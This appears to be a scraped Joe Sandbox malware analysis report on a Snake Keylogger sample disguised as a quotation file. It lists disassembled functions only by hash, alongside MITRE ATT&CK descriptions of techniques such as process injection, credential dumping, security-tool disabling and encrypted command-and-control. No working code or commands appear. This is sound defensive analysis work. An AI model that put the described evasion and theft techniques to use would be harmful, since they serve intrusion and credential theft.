Instruction Fuzzy Hash: E4012C70D18A198FDB9ADF09C844BDDB7B5FF44344F1001AAD408E3290DB34AA86CF44

Function 00007FF848F3ABAB Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777757b023364faafd7ed8a18783c5b3f042b1d05b591387336a07a85a9f219c
Instruction ID: 8a147ea0c5ecfa4b3f36e1040d60dabc1bd2a27c9e196c7d57fd043e325841b6
Opcode Fuzzy Hash: 777757b023364faafd7ed8a18783c5b3f042b1d05b591387336a07a85a9f219c
Instruction Fuzzy Hash: E0F0EC70D18A0A8FEB99EF55C845BE977B5FF04344F1002A9D419E3290DB38A986CB54

Function 00007FF848F30C12 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62c1ac8e5dbde905446b0873e04575934db082d37ff41db0196717dfb0b732c
Instruction ID: 07746316e5d38ec5ab293b6d03342f564df0fb4899281a0f2264eafdbfdc8aec
Opcode Fuzzy Hash: a62c1ac8e5dbde905446b0873e04575934db082d37ff41db0196717dfb0b732c
Instruction Fuzzy Hash: 62F0153090895D8FDF91EB6888596D9BBF0EF69310F1004D6C48DD3251DAB45AC1CF40

Function 00007FF848F30E1F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e168b7fa48045cbbb37dcf4982235aa2daea49686260f7e6aa893f07a6423ff
Instruction ID: 5d0563672f70a55a87be4b6a7dbf8049f6f19e70aa929db132293f3b8e962ad8
Opcode Fuzzy Hash: 7e168b7fa48045cbbb37dcf4982235aa2daea49686260f7e6aa893f07a6423ff
Instruction Fuzzy Hash: 70F01530A099998FEF91EF28C859ADABBF0EF6A310F1000DAC449D7255CB3499D1CF00

Function 00007FF848F30C7B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f1a4dddb08fe22b792acce0ad94237f4a86949139f1de6af0722c47de2c8f91
Instruction ID: 5a74c2a5fd609842596c68f57d790330015dac99891cd14b2f9f3bbf5fa436c8
Opcode Fuzzy Hash: 0f1a4dddb08fe22b792acce0ad94237f4a86949139f1de6af0722c47de2c8f91
Instruction Fuzzy Hash: 21F015709589598FCF91EB2888A86E9BBF0EF6D310F1400EAC449D3261CA345AD2CF00

Function 00007FF848F30B40 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181f3f9c8f75854be80355ce1155ca21fc84996fd358fa682ece1887ec3bbbd6
Instruction ID: 9734987a64a4ed12e7d00f302e70fdb1fb5af2ff7ddb7fdccb42888682b393b9
Opcode Fuzzy Hash: 181f3f9c8f75854be80355ce1155ca21fc84996fd358fa682ece1887ec3bbbd6
Instruction Fuzzy Hash: 3AF0153084996D8FDF90EB68C858B99BBF0FF59210F1041DAC40DE7211CA3469D5CF14

Function 00007FF848F30BA9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2852c6a3309f9cf14471395d01522970bd410e05d2d1a3fb57449cb508e9b1
Instruction ID: 0224baefd383213b8a8ba68268b8ad567f632793eaa4ea62dcc32b64bf66efe7
Opcode Fuzzy Hash: 1b2852c6a3309f9cf14471395d01522970bd410e05d2d1a3fb57449cb508e9b1
Instruction Fuzzy Hash: EFF01C3084889A8FDFA0EB28C858BA9BBF0EF59300F1484E5C40EE7551DA3459C1DF00

Function 00007FF848F30AE4 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a81170e99c8a2a5371258345214be59e371d23a56ff621126b455560db719ad
Instruction ID: fb6002a0dc3c9a48add46f3192484665cb1055970e882fb05de8c35d267e292e
Opcode Fuzzy Hash: 7a81170e99c8a2a5371258345214be59e371d23a56ff621126b455560db719ad
Instruction Fuzzy Hash: DFE06530908A989FCB90EB2884ACBAABBF1EF1A200F0400DAC04CD7221CB3459C1CF01

Function 00007FF848F30F3D Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0a8267075879353ef7fb93e39e4a10f3a6f098e3f4d3388c900b6994a583b6
Instruction ID: b9bee78732c258d867c697549a9c33b0185f851344906510ad514ab3f2597e8b
Opcode Fuzzy Hash: fe0a8267075879353ef7fb93e39e4a10f3a6f098e3f4d3388c900b6994a583b6
Instruction Fuzzy Hash: 31D0127054848A5FD2C1EB6848296F57BE1AF4D200F0804FB8848CB193CB28188A4744

Function 00007FF848F351FA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3373665477.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848f30000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826ccb2ec4b44732916ee0fa83bb55936d096b3b0f66bd1bc99fde437c1ab4ab
Instruction ID: fe5138ce8e1835fc28486845259282931a96b7672c80f5c5d2a4f59099843438
Opcode Fuzzy Hash: 826ccb2ec4b44732916ee0fa83bb55936d096b3b0f66bd1bc99fde437c1ab4ab
Instruction Fuzzy Hash: DFA0029F7CD62138611C31DEF5024EC8749EAC23F79189137E34DD40532A45604A1ABD

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre